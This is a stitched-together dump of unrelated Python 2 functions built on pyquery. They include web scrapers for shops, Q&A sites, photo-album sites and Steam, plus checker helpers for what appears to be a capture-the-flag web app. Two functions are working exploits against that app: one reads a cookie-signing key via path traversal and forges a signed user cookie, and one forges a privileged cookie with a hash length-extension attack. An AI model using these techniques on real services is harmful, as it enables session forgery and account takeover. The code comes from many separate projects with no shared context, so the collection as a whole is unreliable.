def write_bio_test(self):
    # log in, write a bio, then look for the success banner
    s = req.session()
    rs = s.get(self.url + 'login')
    html = rs.text
    token = self._get_token(html)
    x, y = self._get_answer(html)
    rs = s.post(url=self.url + 'login', data={
        self.csrfname: token,
        "username": "******",
        "password": "******",
        "captcha_x": x,
        "captcha_y": y
    })
    rs = s.get(self.url + 'user')
    html = rs.text
    token = self._get_token(html)
    rs = s.post(self.url + "user", data={
        self.csrfname: token,
        "bio": "Too Young Too Simple"
    })
    dom = PQ(rs.text)
    success = dom("div.alert.alert-success")
    success = PQ(success).text().strip()
    if len(success):
        print "[+] Write Bio Success"
        return True
    print "[-] Write Bio Failed"
    return False
def analyse_detail_page(self, html):
    pq = PQ(html)
    div = pq('.main')
    title = div('.QTitle a').text()
    question = div('.Content>.detail').text()
    tags = list(PQ(a).text() for a in div('#tags_nav a'))
    answers = list()
    for li in pq('.QuestionReplies li'):
        li = PQ(li)
        answer_content = li('.body .detail').text()
        vote_div = PQ(li.prev('div'))
        answer_accepted = True if vote_div('.accept-on') else False
        answers.append((answer_content, answer_accepted))
    try:
        text = pq('div[class="Asker special"] .pinfo>span:eq(1)').text()
        # matches "N 回/M阅", i.e. N answers / M views
        count_answer, count_view = re.search(u'(\d+) \u56de/(\d+)\u9605', text).groups()
    except:
        count_answer = 0
        count_view = 1
    return dict(title=title, content=question, tags=tags, answers=answers,
                count_answer=count_answer, count_view=count_view)
def _process(self, page):
    pq = PQ(page)
    data = []
    products = pq('li.grid-tile')
    for product in products:
        foo = PQ(product)
        # origin_price = foo('.product-standard-price').text().replace('MSRP:', '').replace('$', '').strip()
        origin_price = re.findall('[\d\.]+', foo('.product-standard-price').text())
        sales_price = re.findall('[\d\.]+', foo('.product-sales-price').text())
        if not origin_price or not sales_price:
            continue
        data.append({
            'image': foo('img').attr('src'),
            'link': parse_url(foo('.name-link').attr('href')),
            'title': foo('.name-link').text(),
            'original_price': origin_price[0],
            'sales_price': sales_price[0]
        })
    data = {
        'website': 'carters',
        'currency': 'USD',
        'country': 'USA',
        'store_id': self.store_id,
        'data': json.dumps(data)
    }
    data.update(self._extra_kwargs)
    self._save(data)
def exp_make_cookie(self):
    # read the cookie-signing key via path traversal, then forge a signed
    # "username" cookie for Jack_Ma with create_signed_value()
    url = "http://localhost:8233/static/../assets.key"
    req = urllib2.Request(url)
    res_data = urllib2.urlopen(req)
    key = res_data.read()
    tt = escape.native_str(
        create_signed_value(key, 'username', 'Jack_Ma',
                            version=None, key_version=None))
    rs = self.session.get(self.url + 'login')
    html = rs.text
    token = self._get_token(html)
    x, y = self._get_answer(html)
    # rs = self.session.post(url=self.url + 'login', data={
    #     self.csrfname: token,
    #     "username": "******",
    # })
    cookie = {self.csrfname: token, "username": tt}
    rs = self.session.get(url=self.url + 'user', cookies=cookie)
    dom = PQ(rs.text)
    failed = dom('div')
    failed = PQ(failed).text().strip()
    flag = re.findall(r"flag=(.+?) if", failed)
    print flag
def gettoken(html):
    token_name = "token"
    dom = PQ(html)
    form = dom("form")
    token = str(PQ(form)("input[name=\"%s\"]" % token_name).attr("value")).strip()
    return token
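# A quick sanity check for gettoken() above. The form markup below is an
# illustrative assumption (not captured from the target application); it only
# demonstrates that the value of <input name="token"> is returned.
if __name__ == "__main__":
    sample_html = '<form><input name="token" value="abc123"/></form>'
    assert gettoken(sample_html) == "abc123"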
def shopcar_add_test(self):
    rs = self.session.get(self.url + 'shop')
    dom = PQ(rs.text)
    form = dom("form")
    token = str(
        PQ(form[0])("input[name=\"%s\"]" % self.csrfname).attr("value")).strip()
    rs = self.session.post(self.url + 'shopcar/add', data={
        self.csrfname: token,
        'id': 1
    })
    dom = PQ(rs.text)
    commodity = dom('div.shopcar_list')
    commodity = PQ(commodity).text().strip()
    if len(commodity):
        print '[+] Shopcar Add Success'
        return True
    print '[-] Shopcar Add Failed'
    return False
def login(s, username, password, mail, csrfname, url):
    rs = s.get(url + 'login')
    html = rs.text
    token = get_token(html, csrfname)
    x, y = get_answer(html)
    rs = s.post(url=url + 'login', data={
        csrfname: token,
        "username": username,
        "password": password,
        "captcha_x": x,
        "captcha_y": y
    })
    try:
        dom = PQ(rs.text)
        error = dom("div.alert.alert-danger")
        error = PQ(error).text().strip()
        if len(error):
            print "[-] Login failed."
            return False
    except:
        pass
    print "[+] Login Success."
    return True
def register_test(self, invite=''):
    rs = self.session.get(self.url + 'register')
    html = rs.text
    token = self._get_token(html)
    x, y = self._get_answer(html)
    rs = self.session.post(url=self.url + 'register', data={
        self.csrfname: token,
        "username": self.username,
        "password": self.password,
        "password_confirm": self.password,
        "mail": self.mail,
        "invite_user": invite,
        "captcha_x": x,
        "captcha_y": y,
    })
    try:
        dom = PQ(rs.text)
        error = dom("div.alert.alert-danger")
        error = PQ(error).text().strip()
        if len(error):
            print "[-] Register failed."
            return False
    except:
        pass
    print "[+] Register Success."
    return True
def register(s, username, password, mail, csrfname, url, invite=''):
    rs = s.get(url + 'register')
    html = rs.text
    token = get_token(html, csrfname)
    x, y = get_answer(html)
    rs = s.post(url=url + 'register', data={
        csrfname: token,
        "username": username,
        "password": password,
        "password_confirm": password,
        "mail": mail,
        "invite_user": invite,
        "captcha_x": x,
        "captcha_y": y,
    })
    try:
        dom = PQ(rs.text)
        error = dom("div.alert.alert-danger")
        error = PQ(error).text().strip()
        if len(error):
            print "[-] Register failed."
            return False
    except:
        pass
    print "[+] Register Success."
    return True
def _get_token(self, html):
    dom = PQ(html)
    form = dom("form")
    token = str(
        PQ(form)("input[name=\"%s\"]" % self.csrfname).attr("value")).strip()
    return token
def proc_item_list(q):
    keys = ['ruten', 'pchome']
    for k in keys:
        # `this` is injected into the filter callback by pyquery (jQuery-style)
        items = q('a[%s]' % k).filter(lambda i: len(PQ(this).children('img')) == 0)
        if len(items) > 0:
            print 'found via key "%s"' % k
            break
    print 'total links found: %d' % len(items)
    if len(items) == 0:
        return -1
    c = 0
    for i in items:
        m = re.search(DISEL_TITLE, PQ(i).text())
        if not m:
            continue
        c += 1
        dt = {
            'style': m.group('STYLE'),
            'wash': m.group('WASH'),
            'url': PQ(i).attr('href')
        }
        # QUEUE.put(dt)
        proc_item(dt)
        # print dt
    return c
def login(self):
    rs = self.session.get(self.url + 'login')
    html = rs.text
    token = self._get_token(html)
    x, y = self._get_answer(html)
    rs = self.session.post(url=self.url + 'login', data={
        self.csrfname: token,
        "username": self.username,
        "password": self.password,
        "captcha_x": x,
        "captcha_y": y
    })
    try:
        dom = PQ(rs.text)
        error = dom("div.alert.alert-danger")
        error = PQ(error).text().strip()
        if len(error):
            print "[-] Login failed."
            return False
    except:
        pass
    print "[+] Login Success."
    self.wallet = self._get_user_wallet()
    return True
def get_album_page(album_id):
    album_url = "http://www.ugirls.com/Content/List/Magazine-%s.html" % album_id
    album_response = net.http_request(album_url, method="GET")
    result = {
        "image_url_list": [],  # all image URLs
        "is_delete": False,  # whether the album has been deleted
        "model_name": "",  # model name
    }
    if album_response.status != net.HTTP_RETURN_CODE_SUCCEED:
        raise crawler.CrawlerException(
            crawler.request_failre(album_response.status))
    if album_response.data.find("该页面不存在,或者已经被删除!") >= 0:
        result["is_delete"] = True
        return result
    # get the model name
    model_name = PQ(album_response.data).find(
        "div.ren_head div.ren_head_c a").attr("title")
    if not model_name:
        raise crawler.CrawlerException("模特信息截取模特名字失败\n%s" % album_response.data)
    result["model_name"] = model_name.encode("UTF-8").strip()
    # get all image URLs
    image_list_selector = PQ(album_response.data).find("ul#myGallery li img")
    if image_list_selector.length == 0:
        raise crawler.CrawlerException("页面匹配图片地址失败\n%s" % album_response.data)
    for image_index in range(0, image_list_selector.length):
        image_url = image_list_selector.eq(image_index).attr("src")
        if image_url.find("_magazine_web_m.") == -1:
            raise crawler.CrawlerException("图片地址不符合规则\n%s" % image_url)
        result["image_url_list"].append(
            image_url.replace("_magazine_web_m.", "_magazine_web_l."))
    return result
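# Illustrative use of get_album_page() above. The album id "1000" is a
# placeholder, and this helper is hypothetical; it only shows how the returned
# dict (model_name / is_delete / image_url_list) is meant to be consumed.
def print_album_summary(album_id="1000"):
    result = get_album_page(album_id)
    if result["is_delete"]:
        print "album %s has been deleted" % album_id
        return
    print "%s: %s images" % (result["model_name"], len(result["image_url_list"]))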
def reset_password_test(self):
    res = self.session.get(self.url + 'pass/reset')
    html = res.text
    token = self._get_token(html)
    x, y = self._get_answer(html)
    rs = self.session.post(self.url + 'pass/reset', data={
        self.csrfname: token,
        'mail': self.mail,
        "captcha_x": x,
        "captcha_y": y
    })
    dom = PQ(rs.text)
    failed = dom('div.alert.alert-danger')
    failed = PQ(failed).text().strip()
    if len(failed):
        print '[-] Reset Password Failed'
        return True
    print '[+] Reset Password Success'
    return False
def parse_html(filename, download='磁力'):
    # print the href of every <a> whose text contains the keyword
    # (the default '磁力' means "magnet", i.e. magnet links)
    with open(filename, encoding='utf-8') as f:
        html_raw = f.read()
    html = PQ(html_raw)
    alist = html.find('a')
    for a in alist:
        if download in PQ(a).text():
            print(a.attrib['href'])
def extract_detail_url(self, html):
    pq = PQ(html)
    div = pq("div[class='question-detail']")
    hrefs = list()
    for a in div('a:eq(0)'):
        href = PQ(a).attr('href')
        hrefs.append(href)
    return hrefs
def get_album_page(sub_path, page_count):
    album_pagination_url = "http://www.88mmw.com/%s/list_%s_%s.html" % (
        sub_path, SUB_PATH_LIST[sub_path], page_count)
    album_pagination_response = net.http_request(album_pagination_url, method="GET")
    result = {
        "album_info_list": [],  # all album info
        "is_over": False,  # whether this is the last page of albums
    }
    if album_pagination_response.status != net.HTTP_RETURN_CODE_SUCCEED:
        raise crawler.CrawlerException(
            crawler.request_failre(album_pagination_response.status))
    # page encoding
    album_pagination_html = album_pagination_response.data.decode("GBK")
    # get album info; two page layouts exist
    album_list_selector = PQ(album_pagination_html).find("div.xxx li a")
    if album_list_selector.length == 0:
        album_list_selector = PQ(album_pagination_html).find("div.yyy li a")
    if album_list_selector.length == 0:
        raise crawler.CrawlerException("页面截取图集列表失败\n%s" % album_pagination_html.encode("UTF-8"))
    for album_index in range(0, album_list_selector.length):
        result_album_info = {
            "album_title": "",  # album title
            "page_id": None,  # album page id
        }
        album_selector = album_list_selector.eq(album_index)
        # get the album id
        album_url = album_selector.attr("href")
        if not album_url:
            raise crawler.CrawlerException(
                "图集列表截取图集地址失败\n%s" % album_selector.html().encode("UTF-8"))
        album_id = album_url.split("/")[-2]
        if not crawler.is_integer(album_id):
            raise crawler.CrawlerException("图集地址截取图集id失败\n%s" % str(album_url))
        result_album_info["page_id"] = album_id
        # get the album title
        album_title = album_selector.attr("title").encode("UTF-8")
        if len(re.findall("_共\d*张", album_title)) == 1:
            result_album_info["album_title"] = album_title[:album_title.rfind("_共")]
        else:
            result_album_info["album_title"] = album_title
        result["album_info_list"].append(result_album_info)
    # check whether this is the last page
    max_page_info = PQ(album_pagination_html).find("div.page a").eq(-1).text()
    if not max_page_info:
        raise crawler.CrawlerException("总页数信息截取失败\n%s" % album_pagination_html.encode("UTF-8"))
    max_page_count = tool.find_sub_string(max_page_info.encode("UTF-8"), "共", "页")
    if not crawler.is_integer(max_page_count):
        raise crawler.CrawlerException("总页数截取失败\n%s" % max_page_info.encode("UTF-8"))
    result["is_over"] = page_count >= int(max_page_count)
    return result
def extract_detail_url(self, html):
    pq = PQ(html)
    div = pq("div[class='question-summary']")
    hrefs = list()
    for a in div('h3 a'):
        href = PQ(a).attr('href')
        if href.startswith('/'):
            href = self.BASE_URL + href
        hrefs.append(href)
    return hrefs
def getBusArray(self):
    page = PQ(self.URL_DATA)
    array_buttons = []
    selectList = PQ('#linea', page)('option')
    for option in selectList:
        bus = PQ(option).attr('idlinea')
        if bus:
            array_buttons.append([PQ(option).text()])
    return array_buttons
def get_album_page(album_id):
    page_count = max_page_count = 1
    result = {
        "album_title": "",  # album title
        "image_url_list": [],  # all image URLs
        "is_delete": False,  # whether the album has been deleted
    }
    while page_count <= max_page_count:
        album_pagination_url = "http://www.youzi4.cc/mm/%s/%s_%s.html" % (
            album_id, album_id, page_count)
        album_pagination_response = net.http_request(album_pagination_url, method="GET")
        # check whether the album has been deleted
        if album_pagination_response.status == 404 and page_count == 1:
            result["is_delete"] = True
            return result
        if album_pagination_response.status != net.HTTP_RETURN_CODE_SUCCEED:
            raise crawler.CrawlerException(
                "第%s页 " % page_count +
                crawler.request_failre(album_pagination_response.status))
        if page_count == 1:
            # get the album title
            album_title = PQ(album_pagination_response.data.decode(
                "UTF-8")).find("meta[name='description']").attr("content")
            if not album_title:
                raise crawler.CrawlerException("页面截取标题失败\n%s" % album_pagination_response.data)
            result["album_title"] = album_title.encode("UTF-8")
        # get the image URLs
        image_list_selector = PQ(
            album_pagination_response.data).find("div.articleV4Body a img")
        if image_list_selector.length == 0:
            raise crawler.CrawlerException(
                "第%s页 页面匹配图片地址失败\n%s" % (page_count, album_pagination_response.data))
        for image_index in range(0, image_list_selector.length):
            result["image_url_list"].append(
                str(image_list_selector.eq(image_index).attr("src")))
        # get the total page count
        pagination_list_selector = PQ(
            album_pagination_response.data).find("ul.articleV4Page a.page-a")
        if pagination_list_selector.length > 0:
            for pagination_index in range(0, pagination_list_selector.length):
                temp_page_count = pagination_list_selector.eq(pagination_index).html()
                if crawler.is_integer(temp_page_count):
                    max_page_count = max(int(temp_page_count), max_page_count)
        else:
            if page_count > 1:
                raise crawler.CrawlerException(
                    "第%s页 页面匹配分页信息失败\n%s" % (page_count, album_pagination_response.data))
        page_count += 1
    return result
def write_bio(s, payload, csrfname, url):
    rs = s.get(url + 'user')
    html = rs.text
    token = get_token(html, csrfname)
    rs = s.post(url + "user", data={csrfname: token, "bio": payload})
    dom = PQ(rs.text)
    success = dom("div.alert.alert-success")
    success = PQ(success).text().strip()
    if len(success):
        print "[+] Write Bio Success"
        return True
    return False
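# Illustrative end-to-end call of login() and write_bio() above. The base URL,
# credentials and CSRF field name ("csrf_token") are placeholders, and the
# snippet assumes the accompanying get_token()/get_answer() helpers are
# available in the same module.
if __name__ == "__main__":
    s = req.session()
    base_url = "http://127.0.0.1:8000/"
    if login(s, "someuser", "somepass", "someuser@example.com", "csrf_token", base_url):
        write_bio(s, "hello from the checker", "csrf_token", base_url)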
def getBusFirstStreet(self, bus):
    page = PQ(self.URL_DATA)
    array_buttons = []
    selectList = PQ('#linea', page)('option')
    for option in selectList:
        bus_number = PQ(option).text()
        if bus_number == str(bus):
            idLinea = PQ(option).attr('idlinea')
            print(idLinea)
            data = {"accion": self.ACTION_FIRST_STREET, "idLinea": idLinea}
            r = requests.post(self.URL_ACTION, data=data)
            for street in loads(r._content.decode("utf-8-sig").encode("utf-8")):
                array_buttons.append([street["desc"]])
    return array_buttons
def get_one_page_album(account_id, page_count):
    # http://bcy.net/u/50220/post/cos?&p=1
    album_pagination_url = "http://bcy.net/u/%s/post/cos" % account_id
    query_data = {"p": page_count}
    album_pagination_response = net.http_request(album_pagination_url, method="GET", fields=query_data)
    result = {
        "album_info_list": [],  # all album info
        "coser_id": None,  # coser id
        "is_over": False,  # whether this is the last page of albums
    }
    if album_pagination_response.status != net.HTTP_RETURN_CODE_SUCCEED:
        raise crawler.CrawlerException(crawler.request_failre(album_pagination_response.status))
    if page_count == 1 and album_pagination_response.data.find("<h2>用户不存在</h2>") >= 0:
        raise crawler.CrawlerException("账号不存在")
    # get the coser id
    coser_id_find = re.findall('<a href="/coser/detail/([\d]+)/\$\{post.rp_id\}', album_pagination_response.data)
    if len(coser_id_find) != 1:
        raise crawler.CrawlerException("页面截取coser id失败\n%s" % album_pagination_response.data)
    if not crawler.is_integer(coser_id_find[0]):
        raise crawler.CrawlerException("页面截取coser id类型不正确\n%s" % album_pagination_response.data)
    result["coser_id"] = coser_id_find[0]
    # get the album info
    album_list_selector = PQ(album_pagination_response.data.decode("UTF-8")).find("ul.l-grid__inner li.l-grid__item")
    for album_index in range(0, album_list_selector.size()):
        album_selector = album_list_selector.eq(album_index)
        result_album_info = {
            "album_id": None,  # album id
            "album_title": None,  # album title
        }
        # get the album id
        album_url = album_selector.find(".postWorkCard__img a.postWorkCard__link").attr("href")
        if not album_url:
            raise crawler.CrawlerException("作品信息截取作品地址失败\n%s" % album_selector.html().encode("UTF-8"))
        album_id = str(album_url).split("/")[-1]
        if not crawler.is_integer(album_id):
            raise crawler.CrawlerException("作品地址 %s 截取作品id失败\n%s" % (album_url, album_selector.html().encode("UTF-8")))
        result_album_info['album_id'] = album_id
        # get the album title
        album_title = album_selector.find(".postWorkCard__img img").attr("alt")
        result_album_info["album_title"] = str(album_title.encode("UTF-8"))
        result["album_info_list"].append(result_album_info)
    # check whether this is the last page
    last_pagination_selector = PQ(album_pagination_response.data).find("#js-showPagination ul.pager li:last a")
    if last_pagination_selector.size() == 1:
        max_page_count = int(last_pagination_selector.attr("href").strip().split("&p=")[-1])
        result["is_over"] = page_count >= max_page_count
    else:
        result["is_over"] = True
    return result
def shopcar_add_test(self):
    rs = self.session.get(self.url + 'shop/')
    token = self._get_token(rs.text)
    rs = self.session.post(self.url + 'shopcar/add/', data={
        self.csrfname: token,
        'id': random.randint(1, 100)
    })
    dom = PQ(rs.text)
    commodity = dom('div.shopcar_list')
    commodity = PQ(commodity).text().strip()
    if len(commodity):
        print '[+] Shopcar Add Success'
        return True
    print '[-] Shopcar Add Failed'
    return False
def getflag(host, port):
    wc = WebChecker(str(host), str(port))
    wc.register()
    cookies = wc.login()
    # forge a privileged cookie via a hash length-extension attack;
    # hashpump returns (new_digest, new_message)
    gg = hashpump(cookies['user_cookie'], wc.username, 'vip', int(cookies['secretkey_length']))
    cookies['user_cookie'] = gg[0]
    cookies['username'] = gg[1].encode('hex')
    se = req.session()
    url = 'http://%s:%s/' % (host, port)
    rs = se.get(url + 'user', cookies=cookies)
    dom = PQ(rs.text)
    flag = dom("div.alert.alert-success")
    flag = PQ(flag).text().strip()
    print flag
def op_all_text(text):
    # dict keys are Chinese labels: 排行榜 = ranking list, 更新日期 = update date,
    # 排名 = rank, 作品 = book title, 作品链接 = book link
    text = PQ(text)
    try:
        for item in text('div.index_toplist').items():
            t = item('.toptab span').text().split()[0]
            format1 = '{}的{}'
            p = list(
                zip([i for i in item('.tabRight').text() if i != ' '],
                    [i.attr('id')[-1] for i in item('.tabRight span').items()]))
            for ul in item('.topbooks ul').items():
                for name, num in p:
                    a = {'排行榜': t}
                    if num == ul.parent().attr('id')[-1]:
                        a['排行榜'] = format1.format(name, t)
                        p1 = 1
                        for li in ul('li').items():
                            a['更新日期'] = li('.hits').text()
                            a['排名'] = li('.num').text()
                            a['作品'] = li('a').text()
                            a['作品链接'] = 'https://www.qu.la' + li('a').attr('href')
                            yield a, p1
                            a = {}
                            p1 = 0
                    else:
                        continue
    except:
        print('op_all_text has an error!')
def get_book(list1):
    """
    list1: a dict made up of the book name, the book link, and the ranking
    list it belongs to. Fetches every chapter of the book and writes it to
    the relevant file.
    """
    text = get_url(list1['href'])
    text = PQ(text)
    text = text('div#list')
    t = 0  # for testing only
    for dd in text('dd').items():
        try:  # for testing only
            if 'book' in dd('a').attr('href'):
                t += 1
                print(list1)
                if t == 8:
                    break
            write_one_chapter('https://www.qu.la' + dd('a').attr('href'), list1)
            if t == 4:  # for testing only
                return  # for testing only
        except:
            print('get_book has a problem!')
            continue
def get_market_game_trade_card_price(game_id, login_cookie):
    cookies_list = {"steamLogin": login_cookie}
    market_search_url = "http://steamcommunity.com/market/search/render/"
    market_search_url += "?query=&count=20&appid=753&category_753_Game[0]=tag_app_%s&category_753_cardborder[0]=tag_cardborder_0" % game_id
    market_search_response = net.http_request(market_search_url, method="GET",
                                              cookies_list=cookies_list, json_decode=True)
    if market_search_response.status != net.HTTP_RETURN_CODE_SUCCEED:
        raise crawler.CrawlerException(
            crawler.request_failre(market_search_response.status))
    market_item_list = {}
    if not crawler.check_sub_key(
            ("success", "results_html"), market_search_response.json_data):
        raise crawler.CrawlerException(
            "返回信息'success'或'results_html'字段不存在\n%s" % market_search_response.json_data)
    if market_search_response.json_data["success"] is not True:
        raise crawler.CrawlerException("返回信息'success'字段取值不正确\n%s" % market_search_response.json_data)
    card_selector = PQ(market_search_response.json_data["results_html"]).find(
        ".market_listing_row_link")
    for index in range(0, card_selector.length):
        card_name = card_selector.eq(index).find(
            ".market_listing_item_name").text()
        card_min_price = card_selector.eq(index).find(
            "span.normal_price span.normal_price").text().encode(
            "UTF-8").replace("¥ ", "")
        market_item_list[card_name] = card_min_price
    # {'Pamu': '1.77', 'Fumi (Trading Card)': '2.14', 'Mio (Trading Card)': '1.33', 'Bonnibel (Trading Card)': '1.49', 'Groupshot': '1.87', 'Q-Piddy': '1.35', 'Elle (Trading Card)': '1.19', 'Quill': '1.50', 'Iro (Trading Card)': '1.42', 'Bearverly (Trading Card)': '1.27', 'Cassie (Trading Card)': '1.35'}
    return market_item_list
def get_self_account_badges(account_id, login_cookie):
    # first page of badges
    badges_index_url = "http://steamcommunity.com/profiles/%s/badges/" % account_id
    cookies_list = {"steamLogin": login_cookie}
    badges_index_response = net.http_request(badges_index_url, method="GET",
                                             cookies_list=cookies_list)
    if badges_index_response.status != net.HTTP_RETURN_CODE_SUCCEED:
        raise crawler.CrawlerException(
            crawler.request_failre(badges_index_response.status))
    badges_detail_url_list = []
    # badge divs
    badges_selector = PQ(badges_index_response.data).find(
        ".maincontent .badges_sheet .badge_row")
    for index in range(0, badges_selector.length):
        badge_html = badges_selector.eq(index).html().encode("UTF-8")
        # badges that have already dropped all of their cards
        if badge_html.find("无剩余卡牌掉落") >= 0:
            # badge detail page URL
            badge_detail_url = tool.find_sub_string(
                badge_html, '<a class="badge_row_overlay" href="', '"/>')
            if not badge_detail_url:
                raise crawler.CrawlerException("徽章信息截取徽章详细界面地址失败\n%s" % badge_html)
            badges_detail_url_list.append(badge_detail_url)
    # ['http://steamcommunity.com/profiles/76561198172925593/gamecards/459820/', 'http://steamcommunity.com/profiles/76561198172925593/gamecards/357200/', 'http://steamcommunity.com/profiles/76561198172925593/gamecards/502740/', 'http://steamcommunity.com/profiles/76561198172925593/gamecards/359600/', 'http://steamcommunity.com/profiles/76561198172925593/gamecards/354380/', 'http://steamcommunity.com/profiles/76561198172925593/gamecards/359670/', 'http://steamcommunity.com/profiles/76561198172925593/gamecards/525300/', 'http://steamcommunity.com/profiles/76561198172925593/gamecards/337980/', 'http://steamcommunity.com/profiles/76561198172925593/gamecards/591420/']
    return badges_detail_url_list
def get_one_page_account(page_count):
    account_pagination_url = "http://jigadori.fkoji.com/users"
    query_data = {"p": page_count}
    account_pagination_response = net.http_request(account_pagination_url, method="GET",
                                                   fields=query_data)
    pagination_account_list = {}
    if account_pagination_response.status != net.HTTP_RETURN_CODE_SUCCEED:
        raise crawler.CrawlerException(
            crawler.request_failre(account_pagination_response.status))
    account_list_selector = PQ(account_pagination_response.data.decode(
        "UTF-8")).find(".users-list li")
    for account_index in range(0, account_list_selector.length):
        account_selector = account_list_selector.eq(account_index)
        # get the member's name
        account_name = account_selector.find(".profile-name").eq(0).text()
        if not account_name:
            account_name = ""
            # raise robot.CrawlerException("成员信息截取成员名字失败\n%s" % account_selector.html().encode("UTF-8"))
        else:
            account_name = account_name.strip().encode("UTF-8")
        # get the twitter account
        account_id = account_selector.find(".screen-name a").text()
        if not account_id:
            raise crawler.CrawlerException(
                "成员信息截取twitter账号失败\n%s" % account_selector.html().encode("UTF-8"))
        account_id = account_id.strip().replace("@", "")
        pagination_account_list[account_id] = account_name
    return pagination_account_list